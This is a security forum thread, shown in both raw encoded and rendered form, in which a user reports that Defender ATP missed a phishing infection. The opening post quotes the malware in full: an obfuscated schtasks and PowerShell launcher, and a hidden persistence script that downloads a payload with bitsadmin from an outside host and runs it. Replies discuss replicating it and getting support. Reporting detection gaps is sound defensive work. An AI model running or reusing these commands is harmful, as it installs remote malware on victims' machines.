Home

Malware not detected (but it should)

%3CLINGO-SUB%20id%3D%22lingo-sub-655566%22%20slang%3D%22en-US%22%3EMalware%20not%20detected%20(but%20it%20should)%3C%2FLINGO-SUB%3E%3CLINGO-BODY%20id%3D%22lingo-body-655566%22%20slang%3D%22en-US%22%3E%3CP%3ESome%20days%20ago%20a%20colleague%20has%20received%20an%20email%20(O365%20ATP%20protected)%26nbsp%3B%20and%20clicked%20the%20link%20inside.%3C%2FP%3E%3CUL%3E%3CLI%3EThe%20link%20caused%20a%20zip%20file%20to%20be%20downloaded%3C%2FLI%3E%3CLI%3Ethe%20zip%20contained2%20files%2C%20a%20shortcut%20and%20a%20xml%20file%3C%2FLI%3E%3CLI%3Ethe%20shortcut%20actually%20created%20a%20scheduled%20task%3A%20%25windir%25%5CSystem32%5Cschtasks.exe%20%2FF%20%2FCreate%20%2Fsc%20minute%20%2FMO%2015%20%2FTN%20%22AI%22%20%2FST%2005%3A43%20%2FTR%20%22cmd%20%2Fc%20power%25os%3A~6%2C1%25hell%20-eP%20bypAss%20-win%201%20-c%20'%26amp%3B%7Bcd%20%25public%3A~-15%2C9%25%5C%3B%24k%3Ddir%20-r%20-force%20-in%20riepi*.*%7Cselect%20-last%201%3B%24k%3Dcat%20-LiteralPath%20%24k%3B%25os%3A~1%2C1%25ex%20%24k%5B%24k.length-1%5D%7D'%22%3C%2FLI%3E%3CLI%3Eso%20a%20cmd%20was%20started%20and%20then%20a%20powershell%20command%20to%20parse%20the%20content%20of%20the%20zip%20file%3C%2FLI%3E%3CLI%3Ethe%20zip%20file%20contained%20the%20string%20below%20(to%20install%20the%20malware)%3C%2FLI%3E%3C%2FUL%3E%3CP%3ENow%20the%20malware%20is%20correctly%20detected%20but%20a%20week%20ago%20it%20wasn't%3B%20the%20reason%20of%20concern%20is%20that%20Defender%20ATP%20SHOULD%20have%20detected%20a%20suspicious%20activity%3C%2FP%3E%3CUL%3E%3CLI%3Ea%20zip%20was%20downloaded%3C%2FLI%3E%3CLI%3Ethe%20lnk%20file%20when%20double-clicked%20created%20a%20task%3C%2FLI%3E%3CLI%3Ethe%20task%20has%20launched%20a%20cmd%2C%20the%20cmd%20has%20launched%20a%20powershell%20and%20the%20powershell%20has%20gone%20through%20the%20file%20system%20to%20get%20the%20original%20zip%20and%20install%20the%20malware%3C%2FLI%3E%3C%2FUL%3E%3CP%3EI'm%20wondering%20why%20no%20suspicious%20activity%20was%20detected.%3C%2FP%3E%3CP%3EI%20also%20wonder%20why%20there%20is%20no%20a%20way%20to%20interact%20with%20MSFT%20support%20in%20such%20a%20case%20if%20you%20don't%20have%20a%20support%20plan%3B%20evidence%20is%20that%20i'm%20facing%20a%20product%20issue%3C%2FP%3E%3CP%3E%26nbsp%3B%3C%2FP%3E%3CP%3EThe%20string%20contained%20at%20the%20end%20of%20the%20zip%20file%3A%3C%2FP%3E%3CP%3E%24IPgHSp9NqFwlyUdz9EiUaC%3D%24env%3AHOMEDRIVE%2B%24env%3AHOMEPATH%2B'%5CAppData%5CRoaming'%3B%20start-process%20-wiNdowStylE%20HiDden%20schtasks%20'%2Fchange%20%2Ftn%20AI%20%2Fdisable'%3B%20%241ky8EqL4xuTNcMdlzE160A0%20%3D%20(Get-WmiObject%20Win32_ComputerSystemProduct).UUID%3B%20%24d9aSs4246nDe2406Bu0oGMC%3D%241ky8EqL4xuTNcMdlzE160A0.Substring(0%2C6)%3B%20%242mg4sgEtuOEmhIplOMZ3O34%20%3D%20%24IPgHSp9NqFwlyUdz9EiUaC%2B'%5C'%2B%24d9aSs4246nDe2406Bu0oGMC%3BIf(test-path%20%242mg4sgEtuOEmhIplOMZ3O34%22%5C_in%22)%7B%24gZ6ZH3E1bBYDLsCi90GNDKJzl%20%3D%20(Get-Date).AddMinutes(-20)%3B%24gwbsm1Im8I4bn6mZ40KwC3GD%3DGet-ChildItem%20-Path%20%242mg4sgEtuOEmhIplOMZ3O34%22%5C_in%22%20%7C%20Where-Object%20%7B%24_.LastWriteTime%20-gt%20%24gZ6ZH3E1bBYDLsCi90GNDKJzl%20%7D%3Bif%20(%24gwbsm1Im8I4bn6mZ40KwC3GD)%7Bexit%3B%7D%7D%3B%20New-Item%20-ItemType%20Directory%20-Force%20-Path%20%242mg4sgEtuOEmhIplOMZ3O34%3B%24rr%3D%22%60%24namKgJJlKuRmxyZh%3D%22%22%242mg4sgEtuOEmhIplOMZ3O34%5Csbr_init.ps1%22%22%3B%60%24clpsr%3D'%2FC%20bitsadmin%20%2Ftransfer%20JuhtdQPu%20%2Fdownload%20%2Fpriority%20FOREGROUND%20%22%22%3CA%20href%3D%22https%3A%2F%2Fmrscremeansclassroom.com%2Fkfldcncjfvdwer%2Fsdcmgfkbfg%22%20target%3D%22_blank%22%20rel%3D%22nofollow%20noopener%20noreferrer%20noopener%20noreferrer%20noopener%20noreferrer%20noopener%20noreferrer%20noopener%20noreferrer%20noopener%20noreferrer%20noopener%20noreferrer%20noopener%20noreferrer%20noopener%20noreferrer%22%3Ehttps%3A%2F%2Fmrscremeansclassroom.com%2Fkfldcncjfvdwer%2Fsdcmgfkbfg%3C%2FA%3E%22%22%20%22%22'%2B%60%24namKgJJlKuRmxyZh%2B'%22%22'%3B%20start-process%20-wiNdowStylE%20HiDden%20cmd.exe%20%60%24clpsr%3B%60%24e%3D1%3Bwhile(%60%24e%20-eq%201)%7BIf(test-path%20%60%24namKgJJlKuRmxyZh)%7B%60%24e%3D3%3B%7DStart-Sleep%20-s%203%3B%7D%3B%60%24clpsr%3D'%2FC%20powershell%20-win%20hidden%20-ep%20bypass%20-File%20'%2B%60%24namKgJJlKuRmxyZh%3Bstart-process%20-wiNdowStylE%20HiDden%20cmd.exe%20%60%24clpsr%3B%22%3B%24rr%20%7C%20out-file%20%242mg4sgEtuOEmhIplOMZ3O34'%5CKG1PNqifExGVCbhCkcxwnc.ps1'%3B%24VEzW3fIGi5Wmyd12HPG46o%3D'%20%2FF%20%2Fcreate%20%2Fsc%20minute%20%2Fmo%205%20%2FTN%20%22AppRunLog%22%20%2FST%2003%3A30%20%2FTR%20%22powershell.exe%20-ep%20bypass%20-win%201%20-file%20'%2B%242mg4sgEtuOEmhIplOMZ3O34%2B'%5CKG1PNqifExGVCbhCkcxwnc.ps1%20%22'%3B%20start-process%20-wiNdowStylE%20HiDden%20schtasks%20%24VEzW3fIGi5Wmyd12HPG46o%3B%3C%2FP%3E%3C%2FLINGO-BODY%3E%3CLINGO-SUB%20id%3D%22lingo-sub-656127%22%20slang%3D%22en-US%22%3ERe%3A%20Malware%20not%20detected%20(but%20it%20should)%3C%2FLINGO-SUB%3E%3CLINGO-BODY%20id%3D%22lingo-body-656127%22%20slang%3D%22en-US%22%3E%3CP%3E%3CA%20href%3D%22https%3A%2F%2Ftechcommunity.microsoft.com%2Ft5%2Fuser%2Fviewprofilepage%2Fuser-id%2F280003%22%20target%3D%22_blank%22%3E%40pbaratta%3C%2FA%3E%26nbsp%3BYea%20this%20is%20somewhat%20concerning.%20I%20half%20replicated%20what%20you%20posted.%20Created%20a%20shortcut%20with%20the%20scheduled%20task%20command%20line%20and%20zipped%20it%20up.%20Uploaded%20to%20google%20drive%2C%20downloaded%20it%20then%20executed.%26nbsp%3B%3C%2FP%3E%3CDIV%3E%3CH5%20id%3D%22toc-hId-1174328799%22%20id%3D%22toc-hId-1174328799%22%20id%3D%22toc-hId-1174328799%22%20id%3D%22toc-hId-1174328799%22%20id%3D%22toc-hId-1174328799%22%20id%3D%22toc-hId-1174328799%22%3E%3CSPAN%3E-explorer.exe%3C%2FSPAN%3E%3C%2FH5%3E%3C%2FDIV%3E%3CDIV%3E%3CH5%20id%3D%22toc-hId--1377828162%22%20id%3D%22toc-hId--1377828162%22%20id%3D%22toc-hId--1377828162%22%20id%3D%22toc-hId--1377828162%22%20id%3D%22toc-hId--1377828162%22%20id%3D%22toc-hId--1377828162%22%3E%26nbsp%3B%3CI%3E--%3C%2FI%3E%3CSPAN%3E%26nbsp%3B%3C%2FSPAN%3E%3CSPAN%3Echrome.exe%3C%2FSPAN%3E%3C%2FH5%3E%3C%2FDIV%3E%3CDIV%3E%3CH5%20id%3D%22toc-hId-364982173%22%20id%3D%22toc-hId-364982173%22%20id%3D%22toc-hId-364982173%22%20id%3D%22toc-hId-364982173%22%20id%3D%22toc-hId-364982173%22%20id%3D%22toc-hId-364982173%22%3E%26nbsp%3B%20%3CI%3E---%3C%2FI%3E%3CSPAN%3E%26nbsp%3B%3C%2FSPAN%3E%3CSPAN%3EWinRAR.exe%3C%2FSPAN%3E%3C%2FH5%3E%3C%2FDIV%3E%3CDIV%3E%3CH5%20id%3D%22toc-hId-2107792508%22%20id%3D%22toc-hId-2107792508%22%20id%3D%22toc-hId-2107792508%22%20id%3D%22toc-hId-2107792508%22%20id%3D%22toc-hId-2107792508%22%20id%3D%22toc-hId-2107792508%22%3E%26nbsp%3B%20%26nbsp%3B%3CI%3E----%3C%2FI%3Eschtasks.exe%3C%2FH5%3E%3CP%3E%26nbsp%3B%3C%2FP%3E%3CP%3E%3CSPAN%20class%3D%22event-graph--entity--toggle%20event-graph--entity--toggle__minimized%22%3EUhh%20yea%20that%20does%20not%20look%20legitimate%3C%2FSPAN%3E%3C%2FP%3E%3C%2FDIV%3E%3C%2FLINGO-BODY%3E%3CLINGO-SUB%20id%3D%22lingo-sub-657850%22%20slang%3D%22en-US%22%3ERe%3A%20Malware%20not%20detected%20(but%20it%20should)%3C%2FLINGO-SUB%3E%3CLINGO-BODY%20id%3D%22lingo-body-657850%22%20slang%3D%22en-US%22%3E%3CP%3Ehopefully%20we'll%20have%20a%20feedback%20from%20Microsoft%3C%2FP%3E%3C%2FLINGO-BODY%3E%3CLINGO-SUB%20id%3D%22lingo-sub-671927%22%20slang%3D%22en-US%22%3ERe%3A%20Malware%20not%20detected%20(but%20it%20should)%3C%2FLINGO-SUB%3E%3CLINGO-BODY%20id%3D%22lingo-body-671927%22%20slang%3D%22en-US%22%3E%3CP%3E%3CA%20href%3D%22https%3A%2F%2Ftechcommunity.microsoft.com%2Ft5%2Fuser%2Fviewprofilepage%2Fuser-id%2F280003%22%20target%3D%22_blank%22%3E%40pbaratta%3C%2FA%3E%20thanks%20for%20reporting%20this.%20However%2C%20this%20is%20not%20a%20support%20forum.%20For%20a%20thorough%20response%20please%20open%20a%20support%20ticket%20(top%20right%20corner%20of%20the%20portal%2C%20under%20the%20'%3F'%20sign).%26nbsp%3B%3C%2FP%3E%3C%2FLINGO-BODY%3E%3CLINGO-SUB%20id%3D%22lingo-sub-672038%22%20slang%3D%22en-US%22%3ERe%3A%20Malware%20not%20detected%20(but%20it%20should)%3C%2FLINGO-SUB%3E%3CLINGO-BODY%20id%3D%22lingo-body-672038%22%20slang%3D%22en-US%22%3E%3CP%3E%3CA%20href%3D%22https%3A%2F%2Ftechcommunity.microsoft.com%2Ft5%2Fuser%2Fviewprofilepage%2Fuser-id%2F73387%22%20target%3D%22_blank%22%3E%40Raviv%20Tamir%3C%2FA%3Ei%20know%20this%20is%20not%20a%20support%20forum%2C%20but%20i%20still%20think%20it's%20interesting%20(and%20important%20as%20well)%20discussing%20with%20the%20community%20of%20what%20happens%20in%20our%20environment.%20Don't%20you%3F%3C%2FP%3E%3C%2FLINGO-BODY%3E
pbaratta
Occasional Contributor

Some days ago a colleague has received an email (O365 ATP protected)  and clicked the link inside.

  • The link caused a zip file to be downloaded
  • the zip contained2 files, a shortcut and a xml file
  • the shortcut actually created a scheduled task: %windir%\System32\schtasks.exe /F /Create /sc minute /MO 15 /TN "AI" /ST 05:43 /TR "cmd /c power%os:~6,1%hell -eP bypAss -win 1 -c '&{cd %public:~-15,9%\;$k=dir -r -force -in riepi*.*|select -last 1;$k=cat -LiteralPath $k;%os:~1,1%ex $k[$k.length-1]}'"
  • so a cmd was started and then a powershell command to parse the content of the zip file
  • the zip file contained the string below (to install the malware)

Now the malware is correctly detected but a week ago it wasn't; the reason of concern is that Defender ATP SHOULD have detected a suspicious activity

  • a zip was downloaded
  • the lnk file when double-clicked created a task
  • the task has launched a cmd, the cmd has launched a powershell and the powershell has gone through the file system to get the original zip and install the malware

I'm wondering why no suspicious activity was detected.

I also wonder why there is no a way to interact with MSFT support in such a case if you don't have a support plan; evidence is that i'm facing a product issue

 

The string contained at the end of the zip file:

$IPgHSp9NqFwlyUdz9EiUaC=$env:HOMEDRIVE+$env:HOMEPATH+'\AppData\Roaming'; start-process -wiNdowStylE HiDden schtasks '/change /tn AI /disable'; $1ky8EqL4xuTNcMdlzE160A0 = (Get-WmiObject Win32_ComputerSystemProduct).UUID; $d9aSs4246nDe2406Bu0oGMC=$1ky8EqL4xuTNcMdlzE160A0.Substring(0,6); $2mg4sgEtuOEmhIplOMZ3O34 = $IPgHSp9NqFwlyUdz9EiUaC+'\'+$d9aSs4246nDe2406Bu0oGMC;If(test-path $2mg4sgEtuOEmhIplOMZ3O34"\_in"){$gZ6ZH3E1bBYDLsCi90GNDKJzl = (Get-Date).AddMinutes(-20);$gwbsm1Im8I4bn6mZ40KwC3GD=Get-ChildItem -Path $2mg4sgEtuOEmhIplOMZ3O34"\_in" | Where-Object {$_.LastWriteTime -gt $gZ6ZH3E1bBYDLsCi90GNDKJzl };if ($gwbsm1Im8I4bn6mZ40KwC3GD){exit;}}; New-Item -ItemType Directory -Force -Path $2mg4sgEtuOEmhIplOMZ3O34;$rr="`$namKgJJlKuRmxyZh=""$2mg4sgEtuOEmhIplOMZ3O34\sbr_init.ps1"";`$clpsr='/C bitsadmin /transfer JuhtdQPu /download /priority FOREGROUND ""https://mrscremeansclassroom.com/kfldcncjfvdwer/sdcmgfkbfg"" ""'+`$namKgJJlKuRmxyZh+'""'; start-process -wiNdowStylE HiDden cmd.exe `$clpsr;`$e=1;while(`$e -eq 1){If(test-path `$namKgJJlKuRmxyZh){`$e=3;}Start-Sleep -s 3;};`$clpsr='/C powershell -win hidden -ep bypass -File '+`$namKgJJlKuRmxyZh;start-process -wiNdowStylE HiDden cmd.exe `$clpsr;";$rr | out-file $2mg4sgEtuOEmhIplOMZ3O34'\KG1PNqifExGVCbhCkcxwnc.ps1';$VEzW3fIGi5Wmyd12HPG46o=' /F /create /sc minute /mo 5 /TN "AppRunLog" /ST 03:30 /TR "powershell.exe -ep bypass -win 1 -file '+$2mg4sgEtuOEmhIplOMZ3O34+'\KG1PNqifExGVCbhCkcxwnc.ps1 "'; start-process -wiNdowStylE HiDden schtasks $VEzW3fIGi5Wmyd12HPG46o;

4 Replies

@pbaratta Yea this is somewhat concerning. I half replicated what you posted. Created a shortcut with the scheduled task command line and zipped it up. Uploaded to google drive, downloaded it then executed. 

-explorer.exe
 -- chrome.exe
  --- WinRAR.exe
   ----schtasks.exe

 

Uhh yea that does not look legitimate

hopefully we'll have a feedback from Microsoft

@pbaratta thanks for reporting this. However, this is not a support forum. For a thorough response please open a support ticket (top right corner of the portal, under the '?' sign). 

Highlighted

@Raviv Tamiri know this is not a support forum, but i still think it's interesting (and important as well) discussing with the community of what happens in our environment. Don't you?

Related Conversations
Extentions Synchronization
ChirmyRam in Discussions on
3 Replies
Tabs and Dark Mode
cjc2112 in Discussions on
35 Replies
flashing a white screen while open new tab
Deleted in Discussions on
14 Replies
Stable version of Edge insider browser
HotCakeX in Discussions on
35 Replies